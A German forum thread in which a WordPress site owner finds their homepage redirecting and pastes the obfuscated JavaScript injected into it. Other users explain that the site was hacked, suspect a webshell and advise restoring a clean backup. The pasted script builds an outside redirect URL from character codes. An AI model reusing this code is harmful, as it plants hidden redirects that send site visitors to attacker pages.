eigene Homepage nicht erreichbar (Frontend/ Backend)

[Allan Sche Sar]

Hallo ihr,

ich habe heute festgestellt, dass ich nicht mehr auf meine Homepage (moderativ entfernt) komme. Wenn ich es versuche sieht es so aus und die URL passt auch nicht.

Wenn ich probiere ins Backend zu gehen über (moderativ entfernt), dann erhalte ich folgende Text:

function _0x4ee7(_0x3ab2b1,_0x232aee){var _0x45919d=_0x4591();return _0x4ee7=function(_0x4ee7d2,_0x3b1a79){_0x4ee7d2=_0x4ee7d2-0x11e;var _0x1f4a7d=_0x45919d[_0x4ee7d2];return _0x1f4a7d;},_0x4ee7(_0x3ab2b1,_0x232aee);}var _0xa160ea=_0x4ee7;(function(_0x49005e,_0x4c2ad1){var _0x573fb3=_0x4ee7,_0x4721a3=_0x49005e();while(!![]){try{var _0x59874f=-parseInt(_0x573fb3(0x128))/0x1+-parseInt(_0x573fb3(0x120))/0x2+parseInt(_0x573fb3(0x11e))/0x3+parseInt(_0x573fb3(0x127))/0x4*(parseInt(_0x573fb3(0x12a))/0x5)+parseInt(_0x333fb3(0x124))/0x6*(parseInt(_0x573fb3(0x122))/0x7)+parseInt(_0x333fb3(0x123))/0x8+parseInt(_0x573fb3(0x125))/0x9;if(_0x59874f===_0x4c2ad1)break;else _0x4721a3['push'](_0x4721a3['shift']());}catch(_0x4acffc){_0x4721a3['push'](_0x4721a3['shift']());}}}(_0x4591,0x7af8b),window[_0xa160ea(0x11f)]());function _0x4591(){var _0x16eed7=['4004dIMjRC','147351WdUMnX','fromCharCode','335aMKfUh','2002650enzoTj','stop','1288394qSNcFM','location','574714TfwWyK','182616IKcngI','6tizDAA','4101237ZDJeSt','replace'];_0x4591=function(){return _0x16eed7;};return _0x4591();}var lk=String[_0xa160ea(0x129)](0x69,0x63,0x69,0x6f,0x6e,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x2e,0x70,0x68,0x70,0x3f,0x70,0x69,0x64,0x3d,0x35,0x38,0x34,0x2d,0x33,0x34,0x38,0x35,0x37,0x36,0x37,0x34,0x33,0x2d,0x32,0x32);document[_0xa160ea(0x121)]['href']=lk,window[_0xa160ea(0x121)][_0xa160ea(0x126)](lk);

Ich weiß nicht weiter. Vergangen Samstag lief alles noch wie gehabt.
Wie kann ich weiter machen?

 

[madmax2010]

das ist nicht mehr deine homepage
dein wordpress wurde auf gemacht

server komplett neu aufsetzen. letztes nicht verseuchtes backup einspielen

Das ist obfuscateter Schadcode

bitte nimm den link raus, zensirt ein paar random bytes in deinem psot.. mods werden nicht gern schadcode auf CB sehen.

 

[Allan Sche Sar]

Wie meinst du das? Ich habe den Webhost. Der Vertrag ist aktuell gültig. Kannst du das bitte ausführen.

 

[NJay]

Wie meinst du das? Ich habe den Webhost. Der Vertrag ist aktuell gültig. Kannst du das bitte ausführen.

Der Server wurde gehackt. Vermutlich ueber eine Luecke in Wordpress.

 

[Allan Sche Sar]

Ohhhh shit.
Und was kann ich jetzt machen? Was sind die nächsten Schritte?

 

[Marek72]

Hallo,

ja, es sieht so aus als wenn Deine Seite gehackt worden ist und offenbar einige Umleitungen hinterlegt worden sind. Da kann Dir Dein Webhoster leider auch nicht helfen weil Du selber für Deine Seite verantwortlich bist. Stichwort: Absicherungen von WordPress Seiten.

Wie mein Vorredner schon sagte wirst Du ein Backup einspielen müssen und an der Sicherheit Deiner WP Installation etwas ändern.

 

[madmax2010]

website komplett loeschen. datenbank loeschen.
Und dann das letzte backup einspielen

das da ist ne relativ minimale infektion. Ich finde gerade mein de-obfuscation script leider nicht, aber die struktur kommt mir bekannt vor. Das wird relativ sicher ne php webshell sein, ueber die ein Anggreifer mit dem Server beliebige dinbge tun kann. Ich such mal..

Ergänzung (20. Dezember 2021)

Das wird grob was in der richtung sein: https://labs.detectify.com/2019/05/24/how-to-tutorial-php-webshell-de-obfuscation/

 

[NJay]

Ohhhh shit.
Und was kann ich jetzt machen? Was sind die nächsten Schritte?

Wie oben gesagt, letztes Backup einspielen.